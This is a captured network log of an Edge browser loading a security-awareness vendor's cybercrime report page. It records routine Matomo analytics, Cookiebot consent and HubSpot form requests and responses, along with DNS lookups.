/matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=3&rec=1&r=133034&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 400
content-type: text/html; charset=UTF-8
content-length: 280
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,Accept-Encoding,User-Agent
content-encoding: gzip
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=4&rec=1&r=724281&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST /matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=4&rec=1&r=724281&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,User-Agent
-
GEThttps://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsmsedge.exeRemote address:18.195.235.189:443RequestGET /plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats HTTP/2.0
host: sosafeawareness.matomo.cloud
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
content-length: 119
server: Apache
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,Accept-Encoding,User-Agent
content-encoding: gzip
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=3&rec=1&r=756449&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST /matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=3&rec=1&r=756449&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,User-Agent
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=4&rec=1&r=608603&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST /matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=4&rec=1&r=608603&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,User-Agent
-
Remote address:104.84.69.31:443RequestGET /sdk/bc-v4.min.html HTTP/2.0
host: consentcdn.cookiebot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html
etag: "3d08665fa4c7bcf9fa2dcbbc7efe1d0f:1649057029.895163"
last-modified: Mon, 04 Apr 2022 07:23:49 GMT
server: AkamaiNetStorage
x-akamai-transformed: 9 - 0 pmb=mRUM,1
vary: Accept-Encoding
content-encoding: gzip
cache-control: max-age=31536000
expires: Fri, 28 Feb 2025 15:32:29 GMT
date: Thu, 29 Feb 2024 15:32:29 GMT
content-length: 392
server-timing: cdn-cache; desc=HIT
server-timing: edge; dur=1
cross-origin-embedder-policy: require-corp
cross-origin-resource-policy: cross-origin
server-timing: ak_p; desc="1709220749086_1490913215_1128062935_19_696_122_0_255";dur=1
-
GEThttps://consentcdn.cookiebot.com/consentconfig/9342a10a-36bc-4a36-99a3-f105675e7f78/sosafe-awareness.com/configuration.jsmsedge.exeRemote address:104.84.69.31:443RequestGET /consentconfig/9342a10a-36bc-4a36-99a3-f105675e7f78/sosafe-awareness.com/configuration.js HTTP/2.0
host: consentcdn.cookiebot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript
etag: "3b010ed8132a3988e6029c9fb977fb4b:1708860457.40841"
last-modified: Sun, 25 Feb 2024 11:27:37 GMT
server: AkamaiNetStorage
vary: Accept-Encoding
content-encoding: gzip
cache-control: max-age=38956
expires: Fri, 01 Mar 2024 02:21:45 GMT
date: Thu, 29 Feb 2024 15:32:29 GMT
content-length: 300
server-timing: cdn-cache; desc=HIT
server-timing: edge; dur=1
cross-origin-resource-policy: cross-origin
server-timing: ak_p; desc="1709220749230_1490913215_1128062936_17_497_122_144_146";dur=1
-
Remote address:104.84.69.31:443RequestGET /1.gif?dgi=9342a10a-36bc-4a36-99a3-f105675e7f78 HTTP/2.0
host: imgsct.cookiebot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
x-goog-generation: 1698061172769999
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 35
x-goog-hash: crc32c=rX4K2g==
x-goog-hash: md5=whlt6LpBLGDCKrSRr3sUCQ==
x-goog-storage-class: STANDARD
accept-ranges: bytes
content-length: 35
access-control-allow-origin: *
access-control-expose-headers: *
server: UploadServer
last-modified: Mon, 23 Oct 2023 11:39:32 GMT
etag: "c2196de8ba412c60c22ab491af7b1409"
content-type: image/gif
date: Thu, 29 Feb 2024 15:32:30 GMT
cache-control: public,max-age=1800
-
GEThttps://forms.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1msedge.exeRemote address:104.18.160.125:443RequestGET /embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1 HTTP/1.1
Host: forms.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 35
Connection: keep-alive
X-Trace: 2B6CEEB5CC3B531299CA42D568924CDC2277A88C3F000000000000000000
Cache-Control: max-age=0, no-cache, no-store
Vary: origin
Access-Control-Allow-Credentials: false
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-Origin-Hublet
X-Robots-Tag: none
x-envoy-upstream-service-time: 2
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-bfd765d7d-4s88s
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
X-HubSpot-Correlation-Id: ef5e77a2-c316-4293-94a2-70c20b98c3a8
x-request-id: ef5e77a2-c316-4293-94a2-70c20b98c3a8
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Set-Cookie: _cfuvid=sG0oeQvUgL__xN8tsuZHXSkO_nPiu2t3FAdLIJEZiVI-1709220749279-0.0-604800000; path=/; domain=.hsforms.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85d1f5d24c106364-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestforms-na1.hsforms.comIN AResponseforms-na1.hsforms.comIN A104.17.239.249forms-na1.hsforms.comIN A104.18.160.125forms-na1.hsforms.comIN A104.17.207.249forms-na1.hsforms.comIN A104.18.192.125forms-na1.hsforms.comIN A104.18.176.125
-
GEThttps://forms-na1.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1msedge.exeRemote address:104.17.239.249:443RequestGET /embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1 HTTP/1.1
Host: forms-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 35
Connection: keep-alive
X-Trace: 2BE94D583E7EDF2B05DC64AE2300D0A42E8F59916E000000000000000000
Cache-Control: max-age=0, no-cache, no-store
Vary: origin
Access-Control-Allow-Credentials: false
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-Origin-Hublet
X-Robots-Tag: none
x-envoy-upstream-service-time: 3
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-bfd765d7d-ndvzs
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
X-HubSpot-Correlation-Id: c9f59b54-9ff8-41a1-864a-e4e858ee43f4
x-request-id: c9f59b54-9ff8-41a1-864a-e4e858ee43f4
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Set-Cookie: _cfuvid=F6H4iXNy1eVsYvXlrPo_6_mfh6PKcFSlMuVvsykQc.I-1709220749858-0.0-604800000; path=/; domain=.hsforms.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85d1f5d4d9da23e7-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestimgsct.cookiebot.comIN AResponseimgsct.cookiebot.comIN CNAMEimgsct.cookiebot.com.edgekey.netimgsct.cookiebot.com.edgekey.netIN CNAMEe3849.dsca.akamaiedge.nete3849.dsca.akamaiedge.netIN A104.84.69.31
-
Remote address:8.8.8.8:53Requestjs.hsadspixel.netIN AResponsejs.hsadspixel.netIN A104.17.231.163js.hsadspixel.netIN A104.17.229.163js.hsadspixel.netIN A104.17.228.163js.hsadspixel.netIN A104.17.227.163js.hsadspixel.netIN A104.17.230.163
-
Remote address:8.8.8.8:53Requestjs.hsadspixel.netIN A
-
